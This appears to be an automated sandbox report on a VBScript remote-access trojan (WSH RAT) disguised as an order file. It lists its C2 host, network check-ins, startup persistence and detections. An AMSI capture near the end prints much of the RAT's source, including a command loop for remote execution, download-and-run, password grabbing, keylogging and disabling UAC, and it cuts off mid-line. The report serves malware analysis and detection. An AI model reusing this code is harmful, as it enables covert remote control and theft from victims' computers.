Click to jump to signature section
Source: ORDER230322.vbs | ReversingLabs: Detection: 27% |
Source: ORDER230322.vbs | Virustotal: Detection: 41% | Perma Link |
Source: amsi64_5492.amsi.csv | Malware Configuration Extractor: WSHRAT {"C2 url": "chongmei33.publicvm.com", "Port": "7045", "Install folder": "%temp%"} |
Source: C:\Windows\System32\wscript.exe | Domain query: chongmei33.publicvm.com | |
Source: C:\Windows\System32\wscript.exe | Network Connect: 103.47.144.22 7045 | Jump to behavior |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49698 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49699 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49700 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49701 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49702 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49703 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49705 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49706 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49707 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49708 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49709 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49710 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49711 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49712 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49713 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49714 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49715 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49716 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49717 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49718 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49719 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49720 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49721 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49722 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49723 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49724 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49725 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49726 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49727 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49728 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49729 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49730 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49731 -> 103.47.144.22:7045 |
Source: Traffic | Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.3:49732 -> 103.47.144.22:7045 |
Source: Malware configuration extractor | URLs: chongmei33.publicvm.com |
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 7045 -> 49703 |
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 7045 |
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 7045 |
Source: global traffic | TCP traffic: 192.168.2.3:49698 -> 103.47.144.22:7045 |
Source: unknown | HTTP traffic detected: POST /is-ready HTTP/1.1Accept: */*user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/22/2023|Visual BasicAccept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: chongmei33.publicvm.com:7045Content-Length: 0Connection: Keep-AliveCache-Control: no-cache |
Source: unknown | DNS traffic detected: queries for: chongmei33.publicvm.com |
Source: Yara match | File source: amsi64_5492.amsi.csv, type: OTHER |
Source: Yara match | File source: amsi64_2352.amsi.csv, type: OTHER |
Source: Yara match | File source: amsi64_5448.amsi.csv, type: OTHER |
Source: Yara match | File source: amsi64_4024.amsi.csv, type: OTHER |
Source: Yara match | File source: dump.pcap, type: PCAP |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | Jump to behavior |
Source: ORDER230322.vbs | Initial sample: Strings found which are bigger than 50 |
Source: ORDER230322.vbs | ReversingLabs: Detection: 27% |
Source: ORDER230322.vbs | Virustotal: Detection: 41% |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER230322.vbs" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER230322.vbs" |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORDER230322.vbs | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\ORDER230322.vbs | Jump to behavior |
Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@8/4@1/1 |
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Sleep 1009'<[ recoder : kognito (c) skype : live:unknown.sales64 ]>'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=host = "chongmei33.publicvm.com"port = 7045installdir = "%temp%"lnkfile = truelnkfolder = true'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=dim shellobj set shellobj = wscript.createobject("wscript.shell")dim filesystemobjset filesystemobj = createobject("scripting.filesystemobject")dim httpobjset httpobj = createobject("msxml2.xmlhttp")'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=installname = wscript.scriptnamestartup = shellobj.specialfolders ("startup") & "\"installdir = shellobj.expandenvironmentstrings(installdir) & "\"if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"spliter = "|"sleep = 5000 dim responsedim cmddim paraminfo = ""usbspreading = ""startdate = ""dim oneonce'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=on error resume nextinstancewhile trueinstallresponse = ""response = post ("is-ready","")cmd = split (response,spliter)select case cmd (0)case "disconnect" wscript.quitcase "reboot" shellobj.run "%comspec% /c shutdown /r /t 0 /f", 0, TRUEcase "shutdown" shellobj.run "%comspec% /c shutdown /s /t 0 /f", 0, TRUEcase "excecute" param = cmd (1) execute paramcase "get-pass" passgrabber cmd(1), "cmdv.exe", cmd(2)case "uninstall" uninstallcase "up-n-exec" download cmd (1),cmd (2)case "bring-log" upload installdir & "wshlogs\" & cmd (1), "take-log"case "down-n-exec" sitedownloader cmd (1),cmd (2)case "filemanager" servicestarter cmd(1), "fm-plugin.exe", information() case "rdp" servicestarter cmd(1), "rd-plugin.exe", information()case "keylogger" keyloggerstarter cmd(1), "kl-plugin.exe", information(), 0case "offline-keylogger" keyloggerstarter cmd(1), "kl-plugin.exe", information(), 1case "browse-logs" post "is-logs", enumfaf(installdir & "wshlogs")case "cmd-shell" param = cmd (1) post "is-cmd-shell",cmdshell (param)case "get-processes" post "is-processes", enumprocess()case "disable-uac" if WScript.Arguments.Named.Exists("elevated") = true thenset oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","EnableLUA", 0oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","ConsentPromptBehaviorAdmin", |